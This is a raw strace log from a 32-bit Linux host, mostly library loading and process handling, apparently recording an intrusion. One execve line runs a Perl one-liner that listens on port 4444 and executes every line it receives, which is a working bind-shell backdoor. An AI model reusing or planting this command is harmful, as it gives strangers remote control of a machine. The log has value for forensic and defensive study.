9859  20:00:49.576651 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475
9859  20:00:49.576701 read(1, "", 4096) = 0
9859  20:00:49.576711 close(1)          = 0
9859  20:00:49.576720 munmap(0xb7f56000, 4096) = 0
9859  20:00:49.576737 open("/etc/ld.so.cache", O_RDONLY) = 1
9859  20:00:49.576750 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
9859  20:00:49.576766 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f4f000
9859  20:00:49.576776 close(1)          = 0
9859  20:00:49.576787 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9859  20:00:49.576802 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1
9859  20:00:49.576816 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512
9859  20:00:49.576910 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0
9859  20:00:49.576928 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc1000
9859  20:00:49.576940 mmap2(0xb7dc8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7dc8000
9859  20:00:49.576957 close(1)          = 0
9859  20:00:49.576969 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9859  20:00:49.576982 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1
9859  20:00:49.576997 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512
9859  20:00:49.577098 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0
9859  20:00:49.577116 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da9000
9859  20:00:49.577128 mmap2(0xb7dbd000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7dbd000
9859  20:00:49.577144 mmap2(0xb7dbf000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dbf000
9859  20:00:49.577159 close(1)          = 0
9859  20:00:49.577185 munmap(0xb7f4f000, 29913) = 0
9859  20:00:49.577203 open("/etc/ld.so.cache", O_RDONLY) = 1
9859  20:00:49.577215 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
9859  20:00:49.577232 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f4f000
9859  20:00:49.577242 close(1)          = 0
9859  20:00:49.577252 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9859  20:00:49.577267 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1
9859  20:00:49.577282 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
9859  20:00:49.577376 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0
9859  20:00:49.577394 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d9f000
9859  20:00:49.577405 mmap2(0xb7da7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7da7000
9859  20:00:49.577421 close(1)          = 0
9859  20:00:49.577434 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9859  20:00:49.577447 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1
9859  20:00:49.577462 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
9859  20:00:49.577560 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0
9859  20:00:49.577579 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d94000
9859  20:00:49.577591 mmap2(0xb7d9d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d9d000
9859  20:00:49.577607 close(1)          = 0
9859  20:00:49.577628 munmap(0xb7f4f000, 29913) = 0
9859  20:00:49.577645 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1
9859  20:00:49.577659 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)
9859  20:00:49.577671 _llseek(1, 0, [0], SEEK_CUR) = 0
9859  20:00:49.577683 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0
9859  20:00:49.577700 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f56000
9859  20:00:49.577711 _llseek(1, 1624, [1624], SEEK_SET) = 0
9859  20:00:49.577726 munmap(0xb7f56000, 1624) = 0
9859  20:00:49.577736 close(1)          = 0
9859  20:00:49.577764 getpgrp()         = 3831
9859  20:00:49.577775 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0
9859  20:00:49.577790 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0
9859  20:00:49.577807 brk(0x8101000)    = 0x8101000
9859  20:00:49.577841 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
9859  20:00:49.577855 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
9859  20:00:49.577870 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
9859  20:00:49.577908 brk(0x8102000)    = 0x8102000
9859  20:00:49.577935 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
9859  20:00:49.577954 stat64("/sbin/AB", 0xbfc23a78) = -1 ENOENT (No such file or directory)
9859  20:00:49.577967 stat64("/bin/AB", 0xbfc23a78) = -1 ENOENT (No such file or directory)
9859  20:00:49.577978 stat64("/usr/sbin/AB", 0xbfc23a78) = -1 ENOENT (No such file or directory)
9859  20:00:49.577990 stat64("/usr/bin/AB", 0xbfc23a78) = -1 ENOENT (No such file or directory)
9859  20:00:49.578004 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
9859  20:00:49.578024 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dca6f8) = 9860
9860  20:00:49.578119 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
9860  20:00:49.578137 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
9860  20:00:49.578151 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
9860  20:00:49.578163 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
9860  20:00:49.578179 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
9860  20:00:49.578195 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
9860  20:00:49.578209 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
9860  20:00:49.578265 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)
9860  20:00:49.578279 --- SIGPIPE (Broken pipe) @ 0 (0) ---
9860  20:00:49.578344 exit_group(127)   = ?
9859  20:00:49.760684 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>
4519  20:00:49.760735 waitpid(9859,  <unfinished ...>
9859  20:00:49.760781 <... rt_sigprocmask resumed> NULL, 8) = 0
9859  20:00:49.790102 --- SIGCHLD (Child exited) @ 0 (0) ---
9859  20:00:49.790103 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 9860
9859  20:00:49.790103 waitpid(-1, 0xbfc236f8, WNOHANG) = -1 ECHILD (No child processes)
9859  20:00:49.790103 sigreturn()       = ? (mask now [])
9859  20:00:49.790103 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
9859  20:00:49.790104 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
9859  20:00:49.790104 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
9859  20:00:49.790104 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0
9859  20:00:49.790104 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
9859  20:00:49.790104 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0
9859  20:00:49.790105 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
9859  20:00:49.790105 stat64("/sbin/perl", 0xbfc23aa8) = -1 ENOENT (No such file or directory)
9859  20:00:49.790115 stat64("/bin/perl", 0xbfc23aa8) = -1 ENOENT (No such file or directory)
9859  20:00:49.790126 stat64("/usr/sbin/perl", 0xbfc23aa8) = -1 ENOENT (No such file or directory)
9859  20:00:49.790139 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
9859  20:00:49.790157 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
9859  20:00:49.790184 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
9859  20:00:49.790199 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dca6f8) = 9861
9861  20:00:49.830219 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
9861  20:00:49.830220 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
9861  20:00:49.830220 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
9861  20:00:49.830220 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
9861  20:00:49.830220 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
9861  20:00:49.830220 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
9861  20:00:49.830221 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
9861  20:00:49.830221 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0
9861  20:00:49.830221 brk(0)            = 0x8153000
9861  20:00:49.830221 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9861  20:00:49.830250 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f80000
9861  20:00:49.830319 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
9861  20:00:49.830354 open("/etc/ld.so.cache", O_RDONLY) = 1
9861  20:00:49.830368 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
9861  20:00:49.830387 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f78000
9861  20:00:49.830399 close(1)          = 0
9861  20:00:49.830410 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9861  20:00:49.830436 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
9861  20:00:49.830451 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
9861  20:00:49.830659 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
9861  20:00:49.830677 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f74000
9861  20:00:49.830690 mmap2(0xb7f76000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f76000
9861  20:00:49.830727 close(1)          = 0
9861  20:00:49.830757 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9861  20:00:49.830771 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1
9861  20:00:49.830785 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512
9861  20:00:49.830872 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0
9861  20:00:49.830888 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f4f000
9861  20:00:49.830900 mmap2(0xb7f72000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f72000
9861  20:00:49.830915 close(1)          = 0
9861  20:00:49.830927 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9861  20:00:49.830940 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1
9861  20:00:49.830955 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512
9861  20:00:49.831043 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0
9861  20:00:49.831060 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f4e000
9861  20:00:49.831072 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f36000
9861  20:00:49.831083 mmap2(0xb7f4a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f4a000
9861  20:00:49.831098 mmap2(0xb7f4c000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f4c000
9861  20:00:49.831112 close(1)          = 0
9861  20:00:49.831123 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
9861  20:00:49.831136 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1
9861  20:00:49.831150 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512
9861  20:00:49.831282 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
